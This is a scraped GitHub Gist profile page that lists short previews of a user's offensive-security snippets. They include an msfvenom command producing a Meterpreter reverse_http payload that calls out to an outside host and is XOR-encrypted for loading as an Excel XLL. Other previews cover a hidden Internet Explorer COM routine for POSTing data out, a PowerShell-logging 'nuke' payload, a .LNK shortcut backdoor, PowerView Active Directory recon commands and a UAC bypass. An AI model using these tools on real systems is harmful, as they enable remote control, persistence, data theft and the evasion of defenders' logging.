Skip to content

Instantly share code, notes, and snippets.

moo_hax moohax

Block or report user

Report or block moohax

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View sandbox_detect.py
import keras
from keras import models
from keras import layers
from sklearn.preprocessing import StandardScaler, MinMaxScaler, LabelEncoder
import numpy as np
import keras.backend as K
# Main
np.random.seed(7)
network = models.Sequential()
View shellcode_multibyteXOR_ExcelRegisterXLL.c
// Compile with:
// cl.exe x86_meterpreter_reverse_http_xor.c /LD /o x86_meterpreter_reverse_http_xor.xll
//
// C/CPP code obtained like this:
// 1. Get a raw meterpreter shellcode:
// msfvenom -a x86 -p windows/meterpreter/reverse_http LHOST=any.website.com LPORT=80 EnableStageEncoding=True StageEncoder=x86/shikata_ga_nai > met_rev_winhttp_x86.raw
// 2. Encrypt it with a custom multibyte XOR string (https://github.com/Arno0x/ShellcodeWrapper):
// ./shellcode_encoder.py -cpp met_rev_winhttp_x86.raw testkey xor
#include <Windows.h>
@moohax
moohax / ie_com.cs
Created Feb 13, 2018 — forked from leoloobeek/ie_com.cs
InternetExplorer.Application PoC's
View ie_com.cs
// sample function that takes in a destination server, POST data, and custom HTTP request headers
private string SendData(string dst, byte[] postData, string customHeaders)
{
Type com_type = Type.GetTypeFromCLSID(new Guid("0002DF01-0000-0000-C000-000000000046"));
object IE = Activator.CreateInstance(com_type);
object[] falseArr = new object[] { false };
object[] trueArr = new object[] { true };
com_type.InvokeMember("Visible", System.Reflection.BindingFlags.SetProperty, null, IE, falseArr);
com_type.InvokeMember("Silent", System.Reflection.BindingFlags.SetProperty, null, IE, trueArr);
View NukePSLogging.cpp
void Payload() {
DWORD threadId;
CreateThread(
NULL, // default security attributes
0, // use default stack size
MyThreadFunction, // thread function name
NULL, // argument to thread function
0, // use default creation flags
&threadId);
}
@moohax
moohax / nessus_2_db.py
Created Dec 6, 2017 — forked from coldfusion39/nessus_2_db.py
Import Nessus results into a Postgresql database
View nessus_2_db.py
#!/usr/bin/env python
# Copyright (c) 2017, Brandan Geise [coldfusion]
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
@moohax
moohax / LNKBackdoor.ps1
Created Nov 28, 2017 — forked from HarmJ0y/LNKBackdoor.ps1
Functions to 'backdoor' .LNK files with additional functionality and enumerate all 'backdoored' .LNKs on a system.
View LNKBackdoor.ps1
function Set-LNKBackdoor {
<#
.SYNOPSIS
Backdoors an existing .LNK shortcut to trigger the original binary and a payload specified by
-ScriptBlock or -Command.
Author: @harmj0y
License: BSD 3-Clause
Required Dependencies: None
@moohax
moohax / PowerView-3.0-tricks.ps1
Created Nov 28, 2017 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
View PowerView-3.0-tricks.ps1
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
@moohax
moohax / PowerView-2.0-tricks.ps1
Created Nov 28, 2017 — forked from HarmJ0y/PowerView-2.0-tricks.ps1
PowerView-2.0 tips and tricks
View PowerView-2.0-tricks.ps1
# NOTE: the most updated version of PowerView (http://www.harmj0y.net/blog/powershell/make-powerview-great-again/)
# has an updated tricks Gist at https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993
# get all the groups a user is effectively a member of, 'recursing up'
Get-NetGroup -UserName <USER>
# get all the effective members of a group, 'recursing down'
Get-NetGroupMember -GoupName <GROUP> -Recurse
# get the effective set of users who can administer a server
View UACBypass.ps1
function Invoke-UACBypass {
<#
.SYNOPSIS
Bypasses UAC on Windows 10 by abusing the SilentCleanup task to win a race condition, allowing for a DLL hijack without a privileged file copy.
Author: Matthew Graeber (@mattifestation), Matt Nelson (@enigma0x3)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
You can’t perform that action at this time.